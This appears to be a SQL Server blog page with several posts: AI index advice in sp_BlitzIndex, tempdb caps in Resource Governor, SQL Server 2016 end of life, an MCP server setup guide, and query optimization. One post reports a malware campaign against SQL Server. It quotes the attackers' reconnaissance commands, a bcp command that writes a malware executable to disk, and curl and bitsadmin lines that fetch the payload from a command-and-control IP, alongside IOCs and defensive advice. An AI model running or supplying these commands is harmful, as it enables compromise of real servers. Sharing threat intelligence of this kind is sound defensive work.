Monday, March 30, 2026

Brent Added AI to sp_BlitzIndex. I Had to Try It.

Six posts. That's how long it took me to go from skeptic to convinced on sp_BlitzCache + ChatGPT. If you missed that series, here's the recap: AI diagnosed two real performance problems from a single execution plan in < two minutes — and I stopped resisting AI in SQL Server. Here's the one that changed my mind.

Now Brent has opened the same door for sp_BlitzIndex. The March 2026 First Responder Kit release ships @AI support directly into sp_BlitzIndex. Point it at a table, and it comes back with prioritized index recommendations in Markdown — including the exact creation scripts and the undo scripts. I ran it. Here's what happened.

Before You Run Anything: Two Things to Check

First, if you set up sp_BlitzCache AI on the February 2026 release, you need to stop here. The March release has a breaking change where the single Blitz_AI config table has been split into two tables to support per-proc AI prompt configurations. Run Brent's migration script before installing the new version to get things up to speed.

Secondly, if you install your procs in a database other than the master db with an older compatibility level, you may see this:

Msg 102, Level 15, State 1, Procedure sp_BlitzIndex, Line 3844
Incorrect syntax near '$.message.content'.

It's not a bug in the FRK. It's a compatibility level issue. The fix is easy: install in the master database or confirm your target database is at compatibility level 150 or higher. Brent suggested this in the comments on his release post, and a commenter confirmed it resolved the error.

Two Modes. One Parameter.

Parameter What It Does Requires
@AI = 2 Builds the AI prompt for you to copy/paste into any AI of your choice Any SQL Server version. No API key. Just a table name.
@AI = 1 Calls ChatGPT or Gemini directly from SQL Server and returns the advice in your result set SQL Server 2025 or Azure SQL DB. API key configured in the Blitz_AI tables.

Start with @AI = 2. It lets you see exactly what gets sent to the AI before any data leaves your server. Once you've seen the prompt output and are comfortable with the call, @AI = 1 actually makes the AI exchange.

Step 1: @AI = 2 — Build the Prompt

The @TableName parameter is required when using sp_BlitzIndex with @AI. You cannot run it against an entire database. I'm running this against dbo.SalesOrder in my Orders database — one million rows, clustered on the primary key, light on nonclustered indexes. Good candidate for 'missing indexes'.

EXEC dbo.sp_BlitzIndex
    @DatabaseName = 'Orders',
    @SchemaName   = 'dbo',
    @TableName    = 'SalesOrder',
    @AI           = 2;

SSMS Output

We get the standard sp_BlitzIndex output with details for existing and missing indexes, column data types and foreign keys — plus a new AI Prompt value in the resultset (highlighted). This contains the full prompt that sp_BlitzIndex is passing to the AI, existing index definitions plus SQL Server's own missing index suggestions, column data types, and foreign key relationships. No row data. No query plans. Schema and index metadata only.

This is just a snippet of the AI Prompt but you can see the full output here. Copy the output, paste it into ChatGPT, Gemini, Claude — whatever you use.

What the AI Sent Back

The response came back in Markdown. What I got: a prioritized list of index recommendations with reasoning for each one, an assessment of which SQL Server-suggested missing indexes to take as-is, which to combine, and which to skip, along with the full CREATE INDEX scripts ready to run and the corresponding DROP INDEX undo scripts for every recommendation.

The undo scripts are the part I didn't expect. If you're presenting index changes to a customer, showing up with both the change and the rollback already written is the kind of thing that builds trust fast. I didn't have to write either one.

Step 2: @AI = 1 — Make the call to AI

I set this up before with sp_BlitzCache, so @AI = 1 is available to me. If you already configured API credentials for sp_BlitzCache, the same setup works here — which is a key point of the new two-table structure. One setup works for both sp_BlitzCache and sp_BlitzIndex. If you haven't set up credentials yet, my BlitzCache setup post walks through the full API key and database-scoped credential process.

EXEC dbo.sp_BlitzIndex
    @DatabaseName = 'Orders',
    @SchemaName   = 'dbo',
    @TableName    = 'SalesOrder',
    @AI           = 1;

Same syntax, different procedure. This time sp_BlitzIndex builds the prompt, calls the API directly via sp_invoke_external_rest_endpoint, and returns the AI's advice in your result set — without you leaving SSMS. Notice the difference from @AI = 2: the result set now includes four new columns — AI Advice, AI Prompt, AI Payload, and AI Raw Response — all returned directly in SSMS.

SSMS Output

The AI Advice column contains the full implementation-ready recommendation. Click into it and you get a prioritized plan: which indexes to drop, which to create, the exact CREATE INDEX and DROP INDEX scripts, and undo scripts for every change. All of it, right there in your SSMS output.

Another snippet, but you can view the full AI Advice output for this run here.

What It's Actually Sending to the AI

Worth understanding before you run this in a client environment. The system prompt Brent baked into sp_BlitzIndex instructs the model to behave like this:

'You are a very senior database developer working with Microsoft SQL Server and Azure SQL DB. You focus on real-world, actionable advice that will make a big difference, quickly. You value everyone's time, and while you are friendly and courteous, you do not waste time with pleasantries or emoji because you work in a fast-paced corporate environment. Do not describe the table: you are working with other very senior database developers who understand SQL Server deeply, so get straight to the point with your recommendations and scripts.'

Kudos to Brent. No pleasantries. No emoji. Just get-to-the-point recommendations and scripts. I respect that. The data payload it sends is: existing index definitions, SQL Server's missing index suggestions, column data types, and foreign keys. No actual data rows leave your server.

That said, if you use a hosted model like ChatGPT or Gemini, your schema metadata is traveling to a cloud endpoint. That means table names, column names, data types and key structure. For most environments, that's acceptable, but if you're in a regulated shop where even schema metadata is sensitive, know that before you run @AI = 1. As Brent said when someone asked him what sensitive information gets to AI: 'Depends on what AI service you choose to use. That's on you, son.'

The Part That Still Requires a Human

Much like I said in my BlitzCache series: AI didn't replace anything. It accelerated the starting point. Every recommendation it returned, I reviewed against the actual workload before touching a production index. SQL Server's own missing index suggestions are notoriously greedy — they optimize for the query that generated them, not for the table as a whole. The AI takes those suggestions as input and applies judgment. This is much better than taking them raw, but still not a substitute for knowing your environment.

What it saved me: Time. The prompt-to-recommendation cycle on a table I already knew took under two minutes. The undo scripts were already written. The Markdown output went straight into a client deliverable without reformatting. That is a true time saver and a real value.

Go Get the March 2026 FRK

Download at brentozar.com/first-aid, or PowerShell:

Install-DbaFirstResponderKit -SqlInstance YourServerName -Database master

If you already set up sp_BlitzCache AI, be sure to run the migration script first or things will break.

Pick a table you already know has index problems. Run it with @AI = 2 first — no risk, just instant results. See what the prompt looks like and what comes back. Then decide if @AI = 1 is worth the API setup for your environment. For me, on SQL Server 2025 with credentials already configured: Yes. Absolutely. Do it.

More to Read:

Updated First Responder Kit for March 2026 — Brent Ozar
Blitz_AI migration script — GitHub Gist
sp_BlitzCache Can Talk to ChatGPT Now. Here's How. — sqlfingers.com
sp_BlitzCache + ChatGPT: I'm Convinced. — sqlfingers.com
sp_invoke_external_rest_endpoint — Microsoft Learn

Thursday, March 26, 2026

Resource Governor in SQL Server 2025. A Good Change.

Someone runs a massive SELECT INTO #temp, tempdb fills the drive, and the entire instance freezes up dead. You get paged at 2 AM, kill the session, shrink the files, and spend the next day writing a monitoring script that you hope will catch it next time.

SQL Server 2025 finally lets you stay ahead of this. The Resource Governor can now cap how much tempdb space a workload is allowed to consume. Exceed the limit and SQL Server kills the query — not the instance. How cool is that? It's like proactive DBA-ing without the DBA. 😜

What Changed

The Resource Governor has been around since SQL Server 2008, managing CPU, memory, and I/O. Personally, I've always thought it was a bit tedious and somewhat high-maintenance. SQL Server 2025 has added a new option to limit tempdb space consumption that makes things a little more manageable:

Setting What It Does
GROUP_MAX_TEMPDB_DATA_MB Hard cap in megabytes on tempdb data space for the group
GROUP_MAX_TEMPDB_DATA_PERCENT Cap as a percentage of max configured tempdb size

When a query in the managed workload group tries to push past the limit, SQL Server aborts it with error 1138:

Msg 1138, Level 17
Could not allocate a new page for database 'tempdb' because 
that would exceed the limit set for workload group 'default'.

The query dies. The instance lives. End of story.

Step 1: Enable Resource Governor

Resource Governor is disabled by default. Run this to enable it:

ALTER RESOURCE GOVERNOR ENABLE;

Step 2: Monitor Before You Cap

SQL Server 2025 introduces tempdb usage tracking per workload group. Once Resource Governor is enabled, query the following to establish a baseline before setting any limits:

SELECT
    wg.group_id,
    wg.name AS workload_group,
    rg.group_max_tempdb_data_mb AS cap_mb,
    wg.tempdb_data_space_kb / 1024.0 AS current_mb,
    wg.peak_tempdb_data_space_kb / 1024.0 AS peak_mb,
    wg.total_tempdb_data_limit_violation_count AS violations
FROM sys.dm_resource_governor_workload_groups wg JOIN sys.resource_governor_workload_groups rg 
  ON rg.group_id = wg.group_id;

Watch the peaks. You need to know what your workloads actually consume before you set a cap. Setting a 20 GB limit on an instance where reporting queries routinely spike to 25 GB means you're just going to kill the reporting.

Step 3: Set the Cap

The Resource Governor uses workload groups to classify sessions. Every instance ships with a default workload group, and any session that is not explicitly routed to a named group lands in there. This is how you'd limit the tempdb usage on the default group, which puts a ceiling on every unclassified session on the instance:

ALTER WORKLOAD GROUP [default] WITH (GROUP_MAX_TEMPDB_DATA_MB = 20480);
ALTER RESOURCE GOVERNOR RECONFIGURE;

Or to remove that limit:

ALTER WORKLOAD GROUP [default] WITH (GROUP_MAX_TEMPDB_DATA_MB = NULL);
ALTER RESOURCE GOVERNOR RECONFIGURE;

What It Governs (and What It Does Not)

The Resource Governor tracks tempdb data space only. That includes temp tables, table variables, spools, spills, worktables, and sort space. It does not govern tempdb log space and it does not govern the version store.

For the log side, SQL Server 2025 also added support for Accelerated Database Recovery (ADR) on tempdb, which provides instantaneous transaction rollback and aggressive log truncation. Between tempdb data governance and ADR on tempdb, both sides are now more manageable — but they are two separate features that must both be configured separately. NOTE: You cannot enable ADR on the tempdb without a service restart.

The Gotchas

Capping the default workload group is a good start, but not a full solution. If every session lives in the default group, a single query can easily consume the whole cap, leaving everything else with the error 1138 shown above. With mixed workloads, the default group alone is not enough. Reporting and OLTP behave differently under tempdb pressure, and they won't play nicely together. I recommend classifying them into separate user-defined workload groups, each with its own ceiling. This requires a classifier function in master, which is more setup, but very much worth it for environments with mixed workloads. See here: Microsoft Learn.

Tempdb file configuration matters if you use the GROUP_MAX_TEMPDB_DATA_PERCENT setting. With this configuration, your tempdb data files need either autogrow disabled or a defined MAXSIZE, or the percentage setting will not be enforced. When the file config requirements are not met, SQL Server silently ignores the limit and issues warning 10989. Also, if you change tempdb file config after setting percent-based limits, SQL Server also doesn't tell you that your cap just changed. Using the MB-based setting allows more predictable behavior. See Tempdb space resource governance on Microsoft Learn.

ADR on tempdb has a known issue. Microsoft has documented that when ADR is enabled on tempdb, and temporary tables are being created and dropped at a high rate, the workload throughput can be substantially reduced due to latch contention on the sys.sysseobjvalues system table. This issue is currently under investigation. If your workload involves heavy temp table churn, you may want to hold off before enabling ADR on tempdb in production. Or at least test extensively before calling it good.

The version store is not governed. If you use Read Committed Snapshot Isolation (RCSI), snapshot isolation, or ADR, the version store will grow independently of your workload group limits. A long-running transaction can fill tempdb through the version store even if every workload group is perfectly capped. The version store size must be monitored separately via sys.dm_db_file_space_usage.

The Bottom Line

I can't count the number of times I've seen a tempdb filling up its drive. Before SQL Server 2025, the only real options were custom monitoring jobs, alerts — and just hoping that nobody is querying things too ambitiously. Now there is a native kill switch that will let you stay ahead of things.

First, establish good baselines for your hottest sessions. Then enable the Resource Governor and set your cap accordingly. Stop worrying about 2 AM pages for tempdb.

Standard Edition Gets It Now, Too

Even better is that as of SQL Server 2025, Microsoft has moved the Resource Governor from being an Enterprise-only feature to being included in both Standard and Enterprise editions with identical, full capabilities.

More to Read

Tempdb Space Resource Governance — Microsoft Learn
TempDB Filling Up? Try Resource Governor — Brent Ozar
Accelerated Database Recovery — Microsoft Learn
Monitor and Troubleshoot Accelerated Database Recovery — Microsoft Learn
Resource Governor: A New Beginning — Microsoft SQL Server Blog

Wednesday, March 25, 2026

SQL Server 2016: 111 Days. The Last Patch Just Dropped.

On March 10, Microsoft dropped a security patch for SQL Server 2016. It fixed a publicly disclosed, actively scrutinized elevation-of-privilege vulnerability — one that lets any authenticated user escalate straight to sysadmin. Patched. Done. You're safe. For now.

Here's the part that matters most: That patch came with an expiration date. SQL Server 2016 goes end of life on July 14, 2026. That's 111 days from today.

If you're still running SQL Server 2016 in production, this post is for you.

What March 10 Just Told You

This month's Patch Tuesday included three SQL Server elevation-of-privilege vulnerabilities — CVE-2026-21262 (publicly disclosed), CVE-2026-26115, and CVE-2026-26116. SQL Server 2016 got its patch: KB5077474, build 13.0.6480.4.

CVE-2026-21262 is the one worth staring at. Any authenticated database user — not just a DBA, not just a developer — can exploit it to become sysadmin. I wrote about it last week-ish. It's the kind of CVE that belongs on a compliance report, and possibly a very uncomfortable conversation with your manager.

And if you read yesterday's post on the Larva-26002 BCP malware campaign, you already know what the full attack chain looks like once they're in.

Today, you can patch it. After July 14, that option closes. The CVEs keep arriving on schedule, but the patches for SQL Server 2016 are done.

111 Days Is Not as Long as You Think

Walk the calendar backward from July 14. Be honest about your org's real-world timeline.

Activity Typical Time Needed
Inventory and dependency audit 1–2 weeks
Stakeholder approval and budget sign-off 2–4 weeks
Non-production environment testing 2–4 weeks
Application and vendor compatibility validation 1–3 weeks
Change control and production scheduling 2–4 weeks
Buffer for surprises (plan for them) 2 weeks minimum

Add that up and you're at 10–17 weeks — which is, coincidentally, almost exactly 111 days. Starting today puts you right on the edge. Starting next month puts you over it.

If you haven't read what technically breaks in a 2016-to-2025 upgrade — linked servers, replication, full-text catalogs, SSIS, connection strings — start there first. The engine upgrade is not the hard part. Discovering what silently fails afterward is.

The Double Deadline Nobody Is Talking About

Here's a small detail that somehow keeps getting buried in the industry coverage: if your SQL Server 2016 is running on Windows Server 2016 — and many are — both products reach end of life on the exact same day. July 14, 2026. Same day. No grace period for either one.

That means you're not scheduling one upgrade. You're scheduling two, on the same hardware, with the same deadline, competing for the same change window. Coordinate them together now and it's one migration project. Ignore it and it becomes two crises in the same week.

If you're not sure whether your SQL Server 2016 instances are sitting on Windows Server 2016, run this:

SELECT 
    @@SERVERNAME               AS server_name,
    @@VERSION                  AS sql_version,
    host_platform,
    host_distribution,
    host_release
FROM sys.dm_os_host_info;

If host_distribution comes back as 'Windows', check @@VERSION — if it says 'Windows Server 2016', you have both problems in one box.

The CVE Conveyor Belt

This number keeps me up at night on behalf of any of my customers still on 2016: 79 CVEs were published against SQL Server 2016 in 2024 alone, with an average CVSS score of 8.4 in 2025. This is no small thing.

It's not going to slow down after July 14. The researchers and the threat actors definitely aren't checking the EOL calendar. What stops after July 14 is Microsoft's response to what they find. Every vulnerability disclosed after that date becomes a permanent resident in your environment — no patch coming, no timeline, no fix.

To be fair: you can buy your way out of that for a while. Which brings us to the ESU math.

The ESU Trap

Extended Security Updates are Microsoft's 'we'll keep patching it if you keep paying' program. For SQL Server 2016, they're available for up to three additional years past EOL — so through July 2029. But read the fine print before you treat this as a plan.

ESU covers critical security patches only. No bug fixes. No performance improvements. No features. No support calls. And the cost structure is punishing: roughly 75% of your original license cost in year one, doubling each subsequent year. By year three, you may be spending more on ESU than a new license would have cost you when this conversation started.

ESU is a bridge — though a short one — with a toll.

If you're in a regulated industry (PCI-DSS, HIPAA, SOC 2, ISO 27001), there's another wrinkle: those frameworks generally require software to be on a supported, actively patched version. 'We're paying for ESU' may not satisfy your auditors as well as 'We upgraded before the deadline' will.

The Ecosystem Is Already Moving On

Microsoft isn't the only one checking the calendar. Third-party vendors have their own support matrices, and SQL Server 2016 is starting to fall off them.

BMC has already published Control-M/EM 9.0.27, planned for October 2026, and will no longer support MSSQL 2016 as a backend database, and they won't be the last. Application vendors follow the same lifecycle pressure, and they rarely give more than a product release cycle of notice. By the time your ISV emails you about it, you're probably already behind.

Running an unsupported database version also tends to quietly invalidate software support agreements in ways that only surface when something breaks badly and you need the vendor to help. That's a terrible time to learn your environment does not meet your vendor pre-reqs.

What to Do Right Now

If you haven't started, this is the actual checklist — not the marketing version.

First, find every SQL Server 2016 instance you have. Include everything -- even the report server the finance team spun up in 2018 and didn't tell anyone about. This query will tell you what you've got:

SELECT 
    @@SERVERNAME   AS server_name,
    @@VERSION      AS version_string,
    SERVERPROPERTY('ProductVersion')   AS product_version,
    SERVERPROPERTY('ProductLevel')     AS product_level,
    SERVERPROPERTY('Edition')          AS edition;

Anything with a version starting with 13.x is SQL Server 2016. Write them down.

Next, check your linked server providers — because this is the most common place upgrades silently detonate:

SELECT 
    s.name AS linked_server,
    s.provider,
    s.data_source
FROM sys.servers s
WHERE s.is_linked = 1;

Any row showing SQLNCLI or SQLNCLI11 is a problem waiting to happen post-upgrade. SQL Server 2025 ships with MSOLEDBSQL 19, which enforces TLS certificate validation that the old SQL Native Client silently skipped. Those linked servers will fail. Plan for it now, not after your upgrade.

Then — and I cannot stress this enough — test in non-production first. Not just the upgrade. Every downstream connection, every SSIS package, every replication topology, every application connection string. As I said, the engine upgrade itself is typically the easy part. Here's a full breakdown of what will break, and why.

The Bottom Line

SQL Server 2016 just got patched. That's the good news. The better news — if you act on it — is that you still have 111 days to handle things properly, rather than in panic mode.

Every day you wait, the calendar compresses and the options narrow. The organizations that are going to have a bad summer are the ones having this conversation in June. Don't be them.

July 14, 2026. Mark it in red. Then work backwards.

Need help planning the upgrade before the deadline? We do this.

More to Read

sqlfingers: SQL Server 2016 Ends in July. Here's What Will Break.
sqlfingers: Patch Tuesday: Your sysadmin Role Was Up for Grabs
sqlfingers: They Hid Malware in a SQL Table. A Weak Password and BCP Did the Rest.
endoflife.date: Microsoft SQL Server
Microsoft Lifecycle: SQL Server 2016

Tuesday, March 24, 2026

They Hid Malware in a SQL Table. A weak password and BCP Did the Rest.

BCP. I love it. It's a workhorse — bulk copy data in, bulk copy data out, no drama. I've used it more times than I can count. Which is exactly why this stopped me cold: AhnLab's Security Intelligence Center (ASEC) published a confirmed attack report on March 20, 2026 showing an active threat group using BCP to drop malware directly onto SQL Server hosts. No software flaw. No zero-day. They got through a weak password on an internet-exposed server — and then they weaponized BCP. The simple tool we've all used, doing exactly what it was designed to do, except the 'data' being exported is a malware executable.

Who Is Behind This

ASEC tracks this group as Larva-26002. They've been targeting MS-SQL servers since at least January 2024 — starting with Trigona and Mimic ransomware against internet-exposed instances. Palo Alto Unit42 and Zscaler covered Trigona. Securonix tied Mimic to Turkish-speaking threat actors. In 2025, the same group came back with upgraded tools — Teramind alongside AnyDesk, and a new scanner rebuilt in Rust. Now it's 2026 and they've upgraded again. Same group, same targets, new tooling. This is a long-running, actively maintained operation.

How They Get In

Brute force and dictionary attacks against internet-exposed SQL Server instances with weak or default credentials. That's it. No exploit chain, no CVE. Just hammering logins until one works. Once inside, they run basic reconnaissance first for situational awareness:

hostname
whoami
ipconfig /all
netstat -an
tasklist
tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH

Then the Call to BCP

The attacker stores the malware binary inside a database table and then uses BCP to export it to disk as an executable. This is the exact command ASEC documented:

bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\api.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"

Two things to note: the table name uGnzBdZbsi and the format file FODsOZKgAU.txt have not changed since the 2024 incident. ASEC confirmed these identifiers have been consistent across every documented attack cycle from 2024 to date. If you see either of those strings anywhere in your environment, stop whatever you are doing and investigate immediately.

Where BCP isn't available or fails, they fall back to curl, bitsadmin, or PowerShell to pull the payload from an external server:

curl -o "C:\programdata\api.exe" "hxxp://109.205.211[.]13/api.exe"
bitsadmin /transfer job1 /download /priority high "hxxp://109.205.211[.]13/api.exe" "C:\programdata\api.exe"

What Gets Installed

The file being dropped at C:\ProgramData\api.exe is a downloader ASEC labeled 'ICE Cloud Launcher' — written in Go. It authenticates to a command-and-control (C&C) server and pulls down the actual payload: 'ICE Cloud Client,' also Go-based, drops with a randomized filename to disguise itself as a legitimate program.

ICE Cloud Client is a scanner and brute-force tool. It registers with the C&C server, receives a list of MS-SQL addresses to target along with a credential pair to try — they used ecomm/ecomm — and then successful logins go straight back to the C&C server. Your compromised SQL Server is now their scout.

Also interesting, the binary strings inside ICE Cloud are written in Turkish, clearly tying this 2026 campaign to the earlier Mimic ransomware operation.

The Part That Gets Me The Most

ASEC confirmed that in 2026, Larva-26002 attacked the same servers they compromised in 2024. Not similar servers — the same ones. They came back. Servers that were never properly cleaned up are being revisited on a recurring cycle, each time with the group's latest tooling.

Look at that three-year path: ransomware in 2024, Rust-based scanning in 2025, ICE Cloud scanning in 2026. They've moved away from ransomware toward credential scanning at scale, and they're building a hit list. A growing pool of compromised SQL Servers quietly probing for the next victim.

IOCs to Check Right Now

Everything below comes directly from the ASEC report. Confirmed indicators from the active 2026 campaign:

Type Value Notes
Table name uGnzBdZbsi Used to store malware payload since 2024
Format file FODsOZKgAU.txt BCP format file, consistent since 2024
Dropped file C:\ProgramData\api.exe ICE Cloud Launcher downloader
C&C IP 109.205.211[.]13 Payload download and C&C server
Domain hostroids[.]com Associated infrastructure

MD5 hashes published by ASEC for the malware samples:

0a9f2e2ff98e9f19428da79680e80b77
28847cb6859b8239f59cbf2b8f194770
5200410ec674184707b731b697154522
7fbbf16256c7c89d952fee47b70ea759
89bf428b2d9214a66e2ea78623e8b5c9

What Should You Do?

If your SQL Server has any internet exposure — direct or through an application — start here:

Lock down port 1433.

SQL Server should not be reachable from the open internet. Firewall rules should restrict access to known, trusted IP ranges only. If you're not sure what's exposed, find out today.

Audit your SQL logins.

Default and simple credentials are the entry point. Dictionary attacks mean they're trying common passwords. Disable sa if it's not needed. If you have sa enabled with a weak password, or any login with credentials like ecomm/ecomm, change them immediately. Need to find them first? Here's how to find weak passwords using PWDCOMPARE.

Review BCP activity.

BCP is legitimate, but it has no business running unattended on a production server outside of a known, documented process. Check all SQL Server Agent jobs and Windows scheduled tasks for all BCP executions — and then verify each one is intended.

Check for the IOC artifacts.

Search for api.exe in C:\ProgramData\, the table name uGnzBdZbsi, and the format file FODsOZKgAU.txt. These strings have not changed across three years of active attacks. Look. For. Them.

If you were compromised before and 'cleaned up' — verify.

ASEC confirmed return visits to previously compromised servers. A cleanup that didn't include closing the original entry point, such as weak credentials or an exposed port, was not a full cleanup.

These aren't sophisticated attackers. They're patient ones. A weak password and an open port is all it took. Don't make it that easy for them.

More to Read

AhnLab ASEC: Attack Targeting MS-SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002) — March 20, 2026
AhnLab ASEC: Larva-26002 Trigona and Mimic Ransomware Campaign — January 2024
AhnLab ASEC: Larva-26002 2025 Campaign (Rust-based scanner)
Palo Alto Unit42: Trigona Ransomware Update
Zscaler: Technical Analysis of Trigona Ransomware
Securonix: Turkish Hackers Target MS-SQL Servers with Mimic Ransomware

SQL MCP Server: From Setup to Live Data

In a previous post, I covered what SQL MCP Server is, why it matters, and why getting the security model right is non-negotiable. If you haven't read that one, please start there. This post is the follow-up where I'll walk through the full setup and usage. We'll install the tools, configure the server, expose a couple tables, and connect Claude Desktop to query live SQL Server data. It's a simple example of the how-to beginning to end.

What you need before you start

Three things:

Prerequisite Notes
.NET 8 SDK Required to install the DAB CLI. Download from Microsoft — SDK column, Windows x64 installer.
Node.js (LTS) Required for the mcp-remote bridge. Download from nodejs.org — the LTS button on the left.
Claude Desktop The MCP client. Free download at claude.com/download — Windows version. Requires a paid Claude plan.

Both .NET and Node.js are safe, standard installs. Neither runs as a background service, neither touches SQL Server, and both coexist cleanly with whatever else is on your machine. Verify them after install:

dotnet --version
node --version

Step 1: Install the Data API Builder CLI

SQL MCP Server ships as part of Data API Builder (DAB), Microsoft's open source engine for exposing SQL Server data as REST, GraphQL, and MCP endpoints. Version 1.7 is what added MCP support. Install it at commmand line as a global .NET tool:

dotnet tool install -g Microsoft.DataApiBuilder

You'll see some first-run .NET output, then confirmation. Verify the install:

dab --version

You're looking for version 1.7 or later. Mine is 1.7.90, which is current as of this writing.

Step 2: Create a working folder and initialize the config

DAB is driven entirely by a JSON config file. Create a folder to work in and initialize the config against your SQL Server instance:

mkdir C:\dab-mcp
cd C:\dab-mcp
dab init --database-type mssql --connection-string "Server=SQLFINGERSMINI\V2025;Database=Orders;Trusted_Connection=True;TrustServerCertificate=True;" --config dab-config.json --host-mode development

Regarding that connection string, Windows authentication works fine here. There is no reason to switch to SQL auth just for this. Also, TrustServerCertificate=True is needed for local dev instances without a trusted SSL cert, and --host-mode development enables verbose logging, which you'll want while getting set up.

If it works, you'll see something like this:

Step 3: Add your tables

The config file defines the connection. Now you tell DAB which tables to expose. I'm using an Orders database with two tables — Customer (500K rows) and SalesOrder (1M rows) — both exposed as read-only:

dab add Customer --source dbo.Customer --source.type table --permissions "anonymous:read" --description "Customer records"
dab add SalesOrder --source dbo.SalesOrder --source.type table --permissions "anonymous:read" --description "Sales order records"

One gotcha worth calling out: DAB accepts the dab add command without validating that the table actually exists. I mistyped dbo.SalesOrders with a trailing S, and the server threw an 'Invalid object name' error on startup. Another helpful tip: there is no dab remove command. Fixing a typo means opening dab-config.json directly in a text editor and correcting it by hand. Double-check your object names before you add them.

Step 4: Start the server

dab start

DAB connects to SQL Server, pulls schema for each entity, and starts listening on http://localhost:5000. Keep this command prompt window open — it's your running server. The dab start has a fairly large return. This image is just the end of the output and reflects that the DAB server is now running:

Now you want to verify the REST endpoint is working by calling this in a browser:

http://localhost:5000/api/Customer

You should get back a JSON payload with Customer records.

Now verify the MCP endpoint:

http://localhost:5000/mcp

That's not a failure — that's the MCP endpoint working correctly. A browser isn't a valid MCP client, so it's rejecting the connection because no session handshake was initiated. The endpoint is alive and enforcing the protocol. Good.

Step 5: Connect Claude Desktop

Claude Desktop supports MCP connections through a JSON config file. The tricky part on Windows is finding it — the MSIX-packaged version stores it somewhere non-obvious:

%LOCALAPPDATA%\Packages\Claude_pzs8sxrjxfjjc\LocalCache\Roaming\Claude\claude_desktop_config.json

Once you've found it, open in Notepad and add an mcpServers block after your existing preferences section:

{
  "preferences": {
    "coworkWebSearchEnabled": true,
    "ccdScheduledTasksEnabled": true,
    "coworkScheduledTasksEnabled": false
  },
  "mcpServers": {
    "sql-mcp": {
      "command": "npx",
      "args": [
        "mcp-remote@latest",
        "http://localhost:5000/mcp",
        "--allow-http"
      ]
    }
  }
}

What this does: Claude Desktop expects MCP servers to communicate over stdio — a local process it launches itself. DAB uses HTTP. The mcp-remote package (run via npx, which ships with Node.js) bridges the two, and --allow-http tells it that an unencrypted local connection is acceptable — totally fine for a dev setup.

Save the file, then fully quit Claude Desktop. Closing the window isn't enough — it stays running in the background. Use Task Manager, find Claude, and End Task. Then relaunch it from the Start menu.

Once it's back up, click the + button at the bottom of the chat input, then click Connectors. You should see sql-mcp listed and enabled.

Ok. So how does it work?

Start a new chat in Claude Desktop and ask something simple, like 'How many customers do I have?'

Look at that. My question followed by Claude's processing notes and answer at the bottom. Response time? It took just under 2 minutes for Claude to find my server, the Orders database and the Customer table. Important note: DAB doesn't execute arbitrary SQL. It exposes typed CRUD operations against defined entities. There's no SELECT COUNT(*) happening. Claude is calling the read_records tool, paginating the results, and inferring the count from what comes back. For 500K rows with zero efficient query techniques, under 2 minutes is not that bad.

And that's it. The longer response time may be a trade-off for a controlled, auditable surface, but again, I did not use any smarts to optimize the MCP call, and it's on my local instance with limited memory and zero indexes. Just like any other SQL call, do it properly. Think carefully about what you expose and how the agent will interact with it. Large tables with no natural filtering strategy will be slow. If you're building something real, consider exposing scoped views or stored procedures instead of raw tables, and you can also isolate workloads by running AI-generated queries from the MCP server on a separate instance (or replica) to avoid unnecessary overhead. Lastly, you should use the --description flag to give the agent enough context to query intelligently. As I've tried to emphasize in my other sp_BlitzCache/AI posts, the AI is only as good as the data it's given. You need to help the AI do its job effectively.

What this setup actually is

This is a local development configuration. The DAB server runs on your machine, listens on localhost, and only Claude Desktop on that same machine can reach it. That's the right place to start learning the tool, but it's not how you'd deploy this for a customer. Production means containerizing DAB, deploying behind proper authentication, scoping a dedicated low-privilege login, and running over HTTPS. I covered the security concerns in the previous post — and all of that still applies here.

This post shows that the full path from a cold machine to Claude-querying-live-data through a controlled MCP interface is achievable in a couple hours. The tooling works and the configuration is straightforward. I believe this is a good starting point for anyone looking to understand the SQL MCP server as a bridge between AI and your SQL Server databases.

More to Read:

SQL MCP Server overview — Microsoft Learn
What is Data API Builder? — Microsoft Learn
DAB CLI reference — Microsoft Learn
SQL Server MCP: The Bridge Between Your Database and AI — sqlfingers.com

Monday, March 23, 2026

SQL Server 2025 OPPO: Better Plans. Less Duct Tape.

Parameter sniffing has been a recurring theme here lately. If you caught my sp_BlitzCache + AI series, you saw AI correctly diagnose parameter sniffing from a single output. SQL Server 2025 is now taking its own swing at parameter sniffing — automatically, at the engine level. Meet OPPO.

What Is OPPO?

OPPO stands for Optional Parameter Plan Optimization, and it ships in SQL Server 2025 as part of Intelligent Query Processing (IQP). It targets a specific and very common parameter sniffing pattern that has been painful for a long time — the optional parameter predicate. You've written this before:

SELECT *
FROM dbo.Orders
WHERE (CustomerID = @CustomerID OR @CustomerID IS NULL)
AND (StatusCode = @StatusCode OR @StatusCode IS NULL)

This pattern shows up everywhere — search screens, reporting stored procedures, anything that lets the user filter by one, some, or none of several columns. The problem is that the optimizer has always been forced to compile a single plan that works for both cases: when the parameter has a value (seek is right) and when it's NULL (scan is right). It can't do both well. Whichever value got cached first wins. Everything else loses.

OPPO solves this using the same Multiplan infrastructure introduced with Parameter Sensitive Plan Optimization (PSPO) in SQL Server 2022. Instead of a single cached plan, the optimizer now builds a dispatcher plan that evaluates the actual parameter value at runtime and routes to the appropriate query variant — seek when you've got a value, scan when you don't. The right plan for the right situation, automatically. Very nice.

How to Turn It On

OPPO is enabled by default when your database is at compatibility level 170, which is the default for SQL Server 2025. You don't have to do anything. If you want to be explicit about it, or you're managing compatibility levels carefully during an upgrade, here's the syntax:

ALTER DATABASE [YourDatabase] SET COMPATIBILITY_LEVEL = 170;
GO
ALTER DATABASE SCOPED CONFIGURATION SET OPTIONAL_PARAMETER_OPTIMIZATION = ON;
GO

Interestingly, it cannot be enabled/used only at the query level like MAXDOP, FORCE ORDER or other query level hints. You can, however, disable it at the query level if you need to opt out a specific query. So, it's all-or-nothing, but you can edit specific queries to ignore it:

SELECT *
FROM dbo.Orders
WHERE (CustomerID = @CustomerID OR @CustomerID IS NULL)
OPTION (USE HINT('DISABLE_OPTIONAL_PARAMETER_OPTIMIZATION'));

Note that OPPO and PSPO are independent of each other. Enabling one does not require the other.

The Part Nobody Is Talking About

Here is something I want to emphasize for you because the marketing language around IQP features may not accurately reflect the reality.

